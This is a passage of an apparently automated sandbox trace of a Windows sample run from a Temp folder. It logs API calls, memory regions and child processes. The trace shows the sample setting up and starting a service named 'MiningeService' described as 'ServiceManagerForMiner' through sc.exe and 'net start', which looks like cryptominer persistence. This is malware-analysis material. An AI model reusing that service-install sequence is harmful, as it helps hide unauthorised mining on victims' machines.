start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6219 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6227 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6228 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6229 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6230 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6231 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6232 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6233 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6234 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6235 start_va = 0x4f0000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 6236 start_va = 0x30000 end_va = 0x3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 243 os_tid = 0xa8c [0276.718] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fae4 | out: lpSystemTimeAsFileTime=0x12fae4*(dwLowDateTime=0xcb727040, dwHighDateTime=0x1d7fb6e)) [0276.718] GetCurrentProcessId () returned 0xa88 [0276.718] GetCurrentThreadId () returned 0xa8c [0276.718] GetTickCount () returned 0x1d620ed [0276.718] QueryPerformanceCounter (in: lpPerformanceCount=0x12fadc | out: lpPerformanceCount=0x12fadc*=3100292336027) returned 1 [0276.718] GetModuleHandleA (lpModuleName=0x0) returned 0x8b0000 [0276.718] __set_app_type (_Type=0x1) [0276.719] __p__fmode () returned 0x76d631f4 [0276.719] __p__commode () returned 0x76d631fc [0276.719] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8b79c7) returned 0x0 [0276.719] __wgetmainargs (in: _Argc=0x8b9020, _Argv=0x8b9028, _Env=0x8b9024, _DoWildCard=0, _StartInfo=0x8b9034 | out: _Argc=0x8b9020, _Argv=0x8b9028, _Env=0x8b9024) returned 0 [0276.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.723] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0276.723] GetStdHandle (nStdHandle=0xfffffff5) returned 0x214 [0276.723] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0276.724] _wcsicmp (_String1="description", _String2="query") returned -13 [0276.724] _wcsicmp (_String1="description", _String2="queryex") returned -13 [0276.724] _wcsicmp (_String1="description", _String2="start") returned -15 [0276.724] _wcsicmp (_String1="description", _String2="pause") returned -12 [0276.724] _wcsicmp (_String1="description", _String2="interrogate") returned -5 [0276.724] _wcsicmp (_String1="description", _String2="control") returned 1 [0276.724] _wcsicmp (_String1="description", _String2="continue") returned 1 [0276.724] _wcsicmp (_String1="description", _String2="stop") returned -15 [0276.724] _wcsicmp (_String1="description", _String2="config") returned 1 [0276.724] _wcsicmp (_String1="description", _String2="description") returned 0 [0276.724] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3ff850 [0276.727] OpenServiceW (hSCManager=0x3ff850, lpServiceName="MiningeService", dwDesiredAccess=0x2) returned 0x3ff7b0 [0276.728] ChangeServiceConfig2W (hService=0x3ff7b0, dwInfoLevel=0x1, lpInfo=0x12fa14*(lpDescription="ServiceManagerForMiner")) returned 1 [0276.798] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x12f9f4, nSize=0x2, Arguments=0x12fa00 | out: lpBuffer="㹰@行\x12䏍\x8bᔄ\x8b\x01") returned 0x23 [0276.812] GetFileType (hFile=0x214) returned 0x3 [0276.812] LocalAlloc (uFlags=0x0, uBytes=0x46) returned 0x403f08 [0276.812] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] ChangeServiceConfig2 SUCCESS\r\n", cchWideChar=35, lpMultiByteStr=0x403f08, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] ChangeServiceConfig2 SUCCESS\r\n", lpUsedDefaultChar=0x0) returned 35 [0276.812] WriteFile (in: hFile=0x214, lpBuffer=0x403f08*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x12f9e4, lpOverlapped=0x0 | out: lpBuffer=0x403f08*, lpNumberOfBytesWritten=0x12f9e4*=0x23, lpOverlapped=0x0) returned 1 [0276.813] LocalFree (hMem=0x403f08) returned 0x0 [0276.814] LocalFree (hMem=0x403e70) returned 0x0 [0276.814] LocalFree (hMem=0x0) returned 0x0 [0276.814] CloseServiceHandle (hSCObject=0x3ff7b0) returned 1 [0276.814] CloseServiceHandle (hSCObject=0x3ff850) returned 1 [0277.020] exit (_Code=0) Thread: id = 245 os_tid = 0xa94 Process: id = "33" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6b45e000" os_pid = "0xa9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xc94" cmd_line = "C:\\Windows\\system32\\cmd.exe /C net start MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6277 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6278 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6279 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6280 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6281 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6282 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6283 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 6284 start_va = 0x4a4c0000 end_va = 0x4a50bfff monitored = 1 entry_point = 0x4a4c829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6285 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6286 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6287 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6288 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6289 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6290 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6291 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6292 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6293 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6294 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 6295 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6296 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6297 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6298 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6299 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6300 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6301 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6302 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6303 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6304 start_va = 0x5a0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 6305 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6306 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6328 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6329 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6330 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6395 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6396 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6397 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6398 start_va = 0x75400000 end_va = 0x75406fff monitored = 0 entry_point = 0x75401230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 6399 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6400 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6401 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 6402 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 6403 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6404 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6405 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6406 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6407 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6408 start_va = 0x140000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 6409 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6410 start_va = 0x330000 end_va = 0x4b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 6411 start_va = 0x70000 end_va = 0x8dfff monitored = 0 entry_point = 0x8158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6412 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6413 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6414 start_va = 0x5a0000 end_va = 0x720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 6415 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 6416 start_va = 0x890000 end_va = 0x1c8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 6417 start_va = 0x70000 end_va = 0x8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 6418 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6419 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 6420 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6423 start_va = 0x1c90000 end_va = 0x1f5efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 247 os_tid = 0xaa0 [0279.660] GetProcAddress (hModule=0x769b0000, lpProcName="SetConsoleInputExeNameW") returned 0x769da775 [0279.660] GetProcessHeap () returned 0x790000 [0279.660] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x400a) returned 0x7a58d0 [0279.660] GetProcessHeap () returned 0x790000 [0279.661] HeapFree (in: hHeap=0x790000, dwFlags=0x0, lpMem=0x7a58d0 | out: hHeap=0x790000) returned 1 [0279.661] _wcsicmp (_String1="net", _String2=")") returned 69 [0279.662] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0279.662] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0279.662] _wcsicmp (_String1="IF", _String2="net") returned -5 [0279.662] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0279.662] _wcsicmp (_String1="REM", _String2="net") returned 4 [0279.662] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0279.662] GetProcessHeap () returned 0x790000 [0279.662] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x58) returned 0x7a30a0 [0279.662] GetProcessHeap () returned 0x790000 [0279.662] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x10) returned 0x7a0038 [0279.662] GetProcessHeap () returned 0x790000 [0279.662] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x34) returned 0x7a3100 [0279.663] GetConsoleTitleW (in: lpConsoleTitle=0x32f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0279.663] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0279.663] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0279.663] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0279.663] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0279.663] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0279.663] _wcsicmp (_String1="net", _String2="CD") returned 11 [0279.664] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0279.664] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0279.664] _wcsicmp (_String1="net", _String2="REN") returned -4 [0279.664] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0279.664] _wcsicmp (_String1="net", _String2="SET") returned -5 [0279.664] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0279.664] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0279.664] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0279.664] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0279.664] _wcsicmp (_String1="net", _String2="MD") returned 1 [0279.664] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0279.664] _wcsicmp (_String1="net", _String2="RD") returned -4 [0279.664] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0279.664] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0279.664] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0279.664] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0279.664] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0279.664] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0279.664] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0279.664] _wcsicmp (_String1="net", _String2="VER") returned -8 [0279.664] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0279.664] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0279.664] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0279.664] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0279.664] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0279.664] _wcsicmp (_String1="net", _String2="START") returned -5 [0279.664] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0279.664] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0279.664] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0279.664] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0279.664] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0279.664] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0279.665] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0279.665] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0279.665] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0279.665] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0279.665] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0279.665] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0279.665] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0279.665] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0279.665] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0279.665] _wcsicmp (_String1="net", _String2="CD") returned 11 [0279.665] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0279.665] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0279.665] _wcsicmp (_String1="net", _String2="REN") returned -4 [0279.665] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0279.665] _wcsicmp (_String1="net", _String2="SET") returned -5 [0279.665] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0279.665] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0279.665] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0279.665] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0279.665] _wcsicmp (_String1="net", _String2="MD") returned 1 [0279.665] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0279.665] _wcsicmp (_String1="net", _String2="RD") returned -4 [0279.665] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0279.665] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0279.665] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0279.665] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0279.665] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0279.665] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0279.665] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0279.665] _wcsicmp (_String1="net", _String2="VER") returned -8 [0279.665] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0279.665] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0279.666] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0279.666] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0279.666] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0279.666] _wcsicmp (_String1="net", _String2="START") returned -5 [0279.666] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0279.666] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0279.666] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0279.666] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0279.666] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0279.666] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0279.666] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0279.666] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0279.666] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0279.666] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0279.666] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0279.666] _wcsicmp (_String1="net", _String2="IF") returned 5 [0279.666] _wcsicmp (_String1="net", _String2="REM") returned -4 [0279.666] GetProcessHeap () returned 0x790000 [0279.666] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x210) returned 0x7a3140 [0279.666] GetProcessHeap () returned 0x790000 [0279.666] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x3c) returned 0x7a3358 [0279.666] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0279.666] GetProcessHeap () returned 0x790000 [0279.666] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x418) returned 0x7907f0 [0279.667] SetErrorMode (uMode=0x0) returned 0x8001 [0279.667] SetErrorMode (uMode=0x1) returned 0x0 [0279.667] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7907f8, lpFilePart=0x32eec8 | out: lpBuffer="C:\\Windows", lpFilePart=0x32eec8*="Windows") returned 0xa [0279.667] SetErrorMode (uMode=0x8001) returned 0x1 [0279.667] GetProcessHeap () returned 0x790000 [0279.667] RtlReAllocateHeap (Heap=0x790000, Flags=0x0, Ptr=0x7907f0, Size=0x26) returned 0x7907f0 [0279.667] GetProcessHeap () returned 0x790000 [0279.667] RtlSizeHeap (HeapHandle=0x790000, Flags=0x0, MemoryPointer=0x7907f0) returned 0x26 [0279.667] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4f0640, nSize=0x2000 | out: lpBuffer="") returned 0x8f [0279.667] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0279.667] GetProcessHeap () returned 0x790000 [0279.667] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x142) returned 0x7a33a0 [0279.667] GetProcessHeap () returned 0x790000 [0279.667] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0x27c) returned 0x790820 [0279.675] GetProcessHeap () returned 0x790000 [0279.675] RtlReAllocateHeap (Heap=0x790000, Flags=0x0, Ptr=0x790820, Size=0x144) returned 0x790820 [0279.675] GetProcessHeap () returned 0x790000 [0279.675] RtlSizeHeap (HeapHandle=0x790000, Flags=0x0, MemoryPointer=0x790820) returned 0x144 [0279.675] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4f0640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0279.675] GetProcessHeap () returned 0x790000 [0279.675] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x8, Size=0xe0) returned 0x7a34f0 [0279.676] GetProcessHeap () returned 0x790000 [0279.676] RtlReAllocateHeap (Heap=0x790000, Flags=0x0, Ptr=0x7a34f0, Size=0x76) returned 0x7a34f0 [0279.676] GetProcessHeap () returned 0x790000 